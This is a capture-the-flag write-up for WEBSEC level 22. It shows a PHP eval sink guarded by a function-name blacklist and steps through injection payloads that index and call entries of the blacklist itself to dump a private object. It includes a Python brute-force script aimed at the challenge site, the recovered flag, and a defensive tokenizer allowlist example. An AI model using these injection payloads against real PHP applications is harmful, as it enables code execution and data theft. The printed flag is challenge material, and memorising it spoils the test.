WEBSEC Level 22

Challenge description

This is a level to reflect on.

Initial analysis

```php
<?php
class A {
    public $pub;
    protected $pro;
    private $pri;

    function __construct($pub, $pro, $pri) {
        $this->pub = $pub;
        $this->pro = $pro;
        $this->pri = $pri;
    }
}
```

```php
include 'file_containing_the_flag_parts.php';
$a = new A($f1, $f2, $f3); // object created
...
$blacklist = array_merge($funcs_internal, $funcs_extra, $funny_chars, $variables); // array with the potential
                                                                                   // function to dump object $a
...
if ($insecure) {
    echo 'Insecure code detected!';
} else {
    eval("echo $code;");
}
?>
```

Walk through

STEP 1: Index the $blacklist array with {} since [] is blocked.

Payload: $blacklist{1}

OUTPUT: func_get_arg

STEP 2: Call the function at the i'th index of the $blacklist array with $a as its argument.

Payload: $blacklist{1}($a)

OUTPUT: func_get_arg($a)

STEP 3: Find the index in the $blacklist array that holds var_dump.

```python
import sys

from requests import get

url = 'http://websec.fr/level22/index.php'
i = 0
while True:
    # '{{' and '}}' are literal braces, so this builds $blacklist{i}
    params = {'code': '$blacklist{{{0}}}'.format(i)}
    r = get(url, params=params)
    if r.text.find('var_dump') > -1:
        print(i)
        sys.exit(0)
    else:
        i = i + 1
```

OUTPUT: 579

STEP 4: Call the function at index 579 with $a.

Payload: $blacklist{579}($a)

OUTPUT:

```
object(A)#1 (3) {
  ["pub"]=>
  string(17) "WEBSEC{But_I_was_"
  ["pro":protected]=>
  string(18) "told_that_OOP_was_"
  ["pri":"A":private]=>
  string(22) "flawless_and_stuff_:<}"
}
```
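The walkthrough succeeds because the filter blacklists names, while the input can still reference $blacklist itself and call one of its strings as a function. A defensive counterpart, added here and not part of the challenge source: an allowlist check built on PHP's tokenizer, assuming (hypothetically) that the feature only needs to echo arithmetic; is_safe_expression and the sample inputs are illustrative.

```php
<?php
// Added example: allowlist the token types an arithmetic expression needs,
// instead of blacklisting names as the level does.
function is_safe_expression(string $code): bool
{
    // Token ids permitted in the input; every other token id is rejected.
    $allowedIds = [T_LNUMBER, T_DNUMBER, T_WHITESPACE];
    // Single-character tokens permitted in the input.
    $allowedChars = ['+', '-', '*', '/', '%', '(', ')'];

    // Prefix an open tag so the tokenizer lexes $code as PHP source.
    $tokens = token_get_all('<?php ' . $code);
    array_shift($tokens); // drop the T_OPEN_TAG we added

    foreach ($tokens as $token) {
        if (is_array($token)) {
            if (!in_array($token[0], $allowedIds, true)) {
                return false; // T_VARIABLE, T_STRING, quoted strings, ...
            }
        } elseif (!in_array($token, $allowedChars, true)) {
            return false; // '{', '[', ';', '`', ...
        }
    }
    return $tokens !== []; // empty input is rejected as well
}

// Constructed inputs: the payloads from the walkthrough plus benign expressions.
$samples = [
    '1 + 2 * 3',
    '(4 - 1) / 2',
    '$blacklist{1}',
    '$blacklist{579}($a)',
    'var_dump($a)',
];
foreach ($samples as $s) {
    printf("%-22s %s\n", $s, is_safe_expression($s) ? 'allowed' : 'rejected');
}
```

Input that passes this check can still fail to parse or divide by zero, so catch Throwable around the evaluation or, better, compute the result with a small arithmetic parser instead of eval.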

Flag

FLAG: WEBSEC{But_I_was_told_that_OOP_was_flawless_and_stuff_:<}

For further queries, please DM me on Twitter: https://twitter.com/gopika-subramanian.



